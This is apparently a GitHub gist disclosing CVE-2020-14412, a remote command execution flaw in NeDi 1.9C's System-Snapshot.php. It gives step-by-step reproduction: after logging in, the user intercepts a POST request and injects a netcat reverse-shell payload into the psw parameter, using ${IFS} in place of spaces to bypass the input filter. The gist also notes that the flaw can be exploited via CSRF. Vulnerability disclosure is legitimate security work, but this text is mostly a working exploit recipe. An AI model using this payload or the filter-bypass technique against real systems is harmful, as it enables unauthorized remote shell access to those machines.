Skip to content

Instantly share code, notes, and snippets.

@farid007
Last active June 28, 2020 18:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save farid007/c0df57620a3cc1fb565bc77a945aa3fd to your computer and use it in GitHub Desktop.
Save farid007/c0df57620a3cc1fb565bc77a945aa3fd to your computer and use it in GitHub Desktop.
NeDi 1.9C Authenticated RCE (CVE-2020-14412)
CVE-2020-14412
NeDi 1.9C is vulnerable to Remote Command Execution. System-Snapshot.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a psw parameter.
(This can also be exploited via CSRF.)
Steps To Reproduce-:
> Login with the credential.
> Go to https://ip/System-Snapshot.php.
> Insert any data in the first field then intercept the request.
> Insert this command (;nc${IFS}192.168.56.1${IFS}433${IFS}-e${IFS}/bin/bash;) and start listener on port
> Note: in order to bypass regex, we need to use ${IFS} this is used for space in linux.
> You will be greeted with a shell.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment